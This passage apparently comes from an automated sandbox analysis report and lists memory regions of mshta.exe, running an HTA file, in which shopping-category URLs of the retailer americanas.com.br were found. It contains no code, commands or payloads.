Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12399441552.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401910650.00000000069F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401959077.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartwatch-e-smartband?chave=pfm_hm_
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555668791.0000000002F02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefonia
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefonia160
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567402670.000000000C140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580125535.000000000C141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=pfm_hm_tt_1_0_celulares
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=pfm_home_smartphones_menu
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares9q2
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558057036.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509041649.000000000BE06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542732517.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/decoracao
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579335741.000000000BE94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/cervejeira?chave=pfm_hm_tt_1_0_cervejeira
Source: mshta.exe, mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depurador
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/cooktop?chave=pfm_hm_tt_1_0_cooktop
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.0000000009615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/fogao?chave=pfm_hm_tt_1_0_fogao
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/forno-de-embutir?chave=pfm_hm_tt_1_0_forno-
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/freezer?chave=pfm_hm_tt_1_0_freezer
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/geladeira-refrigerador?chave=pfm_hm_tt_1_0_
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/lava-e-seca?chave=pfm_hm_tt_1_0_lava-e-seca
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 